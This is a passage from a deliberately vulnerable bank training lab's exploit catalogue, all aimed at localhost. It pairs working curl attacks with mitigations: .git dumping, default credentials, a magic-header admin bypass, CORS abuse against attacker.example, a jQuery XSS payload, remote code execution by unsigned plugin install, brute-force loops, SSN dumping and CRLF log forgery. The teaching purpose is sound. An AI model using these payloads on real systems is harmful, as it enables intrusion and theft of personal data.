  step copies it, add a deny rule in nginx/Apache: `location ~ /\\. { deny all; }`.
  Use a secrets manager (Vault, AWS Secrets Manager, GitHub Actions secrets)
  and inject at runtime.

--------------------------------------------------------------------------------
 [54] Security misconfig — /.git/ exposed
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  express.static mount on /.git
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/.git/HEAD          # ref: refs/heads/main
  curl http://localhost:3001/.git/config        # remote URL + user identity
  curl http://localhost:3001/.git/refs/heads/main
  # Real campaigns then run `git-dumper` to pull every object and recover
  # the full source tree (including secrets later "rotated").

MITIGATION
  Build artefact must NOT contain `.git/`. Add to .dockerignore and to the
  deploy bundle exclude list. Web server: `location ~ /\\.git { deny all; }`.

--------------------------------------------------------------------------------
 [55] Security misconfig — /internal/dashboard default creds admin:admin
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  GET /internal/dashboard  (HTTP Basic Auth)
CHAPTER 33

EXPLOIT
  curl -i http://localhost:3001/internal/dashboard            # 401 WWW-Authenticate
  curl -u admin:admin http://localhost:3001/internal/dashboard
  # Returns the internal ops panel with restart-db / flush-cache / debug links.

MITIGATION
  Move ops dashboards behind SSO + MFA + IP allow-list. Never accept default
  credentials; rotate-on-first-login + complexity policy. Lock /internal/* at
  the load balancer to corporate VPN ranges only.

--------------------------------------------------------------------------------
 [56] Security misconfig — verbose Server + X-Powered-By banner
--------------------------------------------------------------------------------
SINK   server.js  Server header middleware
CHAPTER 33

EXPLOIT
  curl -I http://localhost:3001/login | grep -iE 'server|x-powered'
  # Server: nginx/1.18.0 (Ubuntu) + Express/4.19.2
  # X-Powered-By: Express
  # Attacker now knows the exact stack and looks up CVEs for that version.

MITIGATION
  `app.disable('x-powered-by')`. Strip Server in nginx with `server_tokens off`.
  Don't advertise version numbers anywhere. Patch instead.

--------------------------------------------------------------------------------
 [57] Security misconfig — backup file /static/backup/admin.js.bak
--------------------------------------------------------------------------------
SINK   data/exposed/admin.js.bak  +  routes/misconfig.js
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/static/backup/admin.js.bak
  # Reveals the hard-coded X-Support-Token primitive used by [58].

MITIGATION
  Never copy backup/temp files into the deploy bundle. Block common suffixes
  at the proxy: `.bak`, `.old`, `.orig`, `.swp`, `~`, `.tar.gz`, `.zip`.

--------------------------------------------------------------------------------
 [58] Security misconfig — support-token bypass header
--------------------------------------------------------------------------------
SINK   routes/admin.js  X-Support-Token middleware
CHAPTER 33

EXPLOIT
  curl -s -o /dev/null -w '%{http_code}\\n' http://localhost:3001/admin
  # 302 (redirect to login)
  curl -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' http://localhost:3001/admin
  # 200 — admin dashboard with no login at all.

MITIGATION
  Remove all "magic header" bypass paths. Production code should never trust
  a static, shareable string for privilege elevation. If support tooling
  needs elevated access, use short-lived signed tokens scoped per request
  and audit-logged.

--------------------------------------------------------------------------------
 [59] Security misconfig — CORS reflected origin + credentials on /api
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  corsReflect middleware on /api
CHAPTER 33

EXPLOIT
  curl -i -H 'Origin: https://attacker.example' http://localhost:3001/api/me
  # Access-Control-Allow-Origin: https://attacker.example
  # Access-Control-Allow-Credentials: true
  # A page on attacker.example can fetch('/api/me', {credentials:'include'})
  # and read the JSON response.

MITIGATION
  Use an explicit allow-list of trusted origins. If credentials are needed,
  Allow-Origin must be a single fixed origin, NEVER a wildcard or reflection.

--------------------------------------------------------------------------------
 [60] Security misconfig — /uploads/ directory listing enabled
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  listingMiddleware on /uploads
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/uploads/
  # HTML listing of every other tenant's uploaded file.

MITIGATION
  Disable autoindex on every static mount (Express does not enable it; this
  lab opted in intentionally). For nginx, ensure `autoindex off;`. Store user
  uploads behind a permission-checked download route, not directly served.


--------------------------------------------------------------------------------
 [61] Vulnerable component — jQuery 1.12.4 `$()` HTML parsing
--------------------------------------------------------------------------------
SINK   public/js/app.js  applyTheme() IIFE
CHAPTER 34

The bank loads public/vendor/jquery-1.12.4.min.js in
views/partials/header.ejs. app.js reads ?theme= from
window.location.search and passes it to `$()`. Any string
starting with `<` is parsed as HTML and turned into real DOM
nodes -- including <img onerror=...>, which fires in the
browser when the src 404s.

EXPLOIT
  Browse (in a real browser, not curl):
    http://localhost:3001/accounts?theme=<img src=x onerror=alert(1)>
  Or unauthenticated on /register:
    http://localhost:3001/register?theme=<img src=x onerror=alert(1)>

VERIFY without a browser (jsdom):
  See book/chapters/34-vulnerable-and-outdated-components.md Section 5.1.

MITIGATION
  - Upgrade jQuery to >= 3.5.0 (CVE-2020-11022, CVE-2020-11023 patched).
  - Never pass user input to `$()`. If you need to set HTML, use `.text()`
    or wrap with `DOMPurify.sanitize(...)`.
  - CSP: `script-src 'self'` blocks the inline `onerror=` payload.


--------------------------------------------------------------------------------
 [62] Software & Data Integrity — unsigned plugin install → RCE
--------------------------------------------------------------------------------
SINK   routes/integrity.js (B-INT-001)
MOUNT  app.use('/admin/integrity', require('./routes/integrity'))

The "Plugin Studio" endpoint accepts arbitrary JavaScript and
`require()`s it into the running bank process. The handler validates
only the plugin *name* (filename charset) — never the *bytes*. There
is no signature, no checksum, no allow-list of authors, no SBOM.

EXPLOIT (no auth required — the route is not behind requireSession)
  curl -s -X POST http://localhost:3001/admin/integrity/install \
    -H 'Content-Type: application/json' \
    -d '{"name":"pwn1","code":"module.exports={init:()=>require(\"child_process\").execSync(\"whoami\").toString().trim()};"}'
  # => {"installed":"pwn1","init":"REDMOND+t-ibadawy"}

LIST installed plugins:
  curl -s http://localhost:3001/admin/integrity/list

WHY THIS IS A08 (not just "RCE")
  A08 Software & Data Integrity Failures covers code & data shipped into
  the application without verifying its origin or integrity. This sink
  is the lab analog of:
    - npm install of a typosquat / hijacked maintainer (event-stream 2018)
    - SolarWinds Orion build-server tampering (2020)
    - Codecov bash uploader supply-chain tampering (2021)

MITIGATION
  - Require detached signatures (sigstore/cosign, GPG, or in-house Ed25519)
    over the plugin tarball and verify before `require()`.
  - Pin a SHA-256 allow-list of approved plugins.
  - Run plugins in a separate process / sandbox (vm2 is deprecated; use
    `node --experimental-permission` or a child process with restricted env).
  - Authenticate the endpoint and audit-log every install with the signer
    identity (Ch 36).


--------------------------------------------------------------------------------
 [63] Logging & Monitoring failures
--------------------------------------------------------------------------------
SINKS  lib/audit.js  +  routes/auth.js  +  routes/admin.js
TABLE  audit_log (id, user_id, action, details, created_at)

Four overlapping gaps make the bank a textbook A09 target:

  B-LOG-001  Failed logins are NOT audited.
             routes/auth.js calls audit() only on success.  An
             attacker can iterate the entire password list against a
             single account and leave zero entries behind.
  B-LOG-002  Reading /admin/users/:id (which returns the full row
             including SSN and password hash) is NOT audited, and
             /admin/users/:id/delete (account deletion) is NOT audited.
             Mass SSN enumeration and account wiping are invisible.
  B-LOG-003  The `details` column is built from raw request bytes.
             A newline (or CRLF) inside the value -- e.g. in the
             /forgot `email` parameter -- forges additional log lines
             that the defender will read as legitimate audit entries.
  B-LOG-004  GET /admin/audit has no role check (the surrounding
             /admin router uses only requireSession).  Any logged-in
             user (or anyone with the leaked X-Support-Token) can
             read the defender's own log.

EXPLOIT  (no auth needed -- support-token bypass from B-MIS-006)
  # 10 failed login attempts, all 401, NONE recorded:
  for i in 1 2 3 4 5 6 7 8 9 10; do
    curl -s -o /dev/null -X POST http://localhost:3001/login \
      -d "username=alice.chen&password=wrong$i"
  done
  # one success -- IS recorded
  curl -s -o /dev/null -X POST http://localhost:3001/login \
    -d 'username=alice.chen&password=Password123!'

  # 5 SSNs dumped, NONE recorded:
  for id in 1 2 3 4 5; do
    curl -s -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' \
      http://localhost:3001/admin/users/$id
  done

  # Defender reads /admin/audit -- they see 'login_success' and the
  # seed row only:
  curl -s -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' \
    http://localhost:3001/admin/audit

LOG INJECTION  (CRLF forgery via /forgot)
  curl -s --data-urlencode $'email=victim@x.com\n2099-01-01T00:00:00 | 1 | login | admin login from 8.8.8.8' \
    http://localhost:3001/forgot
  # /admin/audit now displays a forged "admin login from 8.8.8.8"
  # row that no one performed.

MITIGATION
  - Audit BOTH success AND failure (especially failure -- it is the
    interesting signal).  Include actor IP and User-Agent.
  - Sanitise log inputs.  Strip or escape \r, \n and any control
    bytes BEFORE concatenating into the `details` field.
  - Add a real role guard to /admin/audit (requireAdmin) AND treat the
    audit log as append-only with periodic export to a write-once
    store outside the app.
  - Alert on patterns: N failed logins from one IP, M SSN reads in
    one minute, audit_log write failures.


================================================================================
 Reproducibility note
================================================================================
After exploitation, reset the lab with:
   rm -rf data/   # or `Remove-Item -Recurse -Force data`
   node seed.js
or just stop the server and re-run `./run.ps1` (auto-reseeds on empty DB).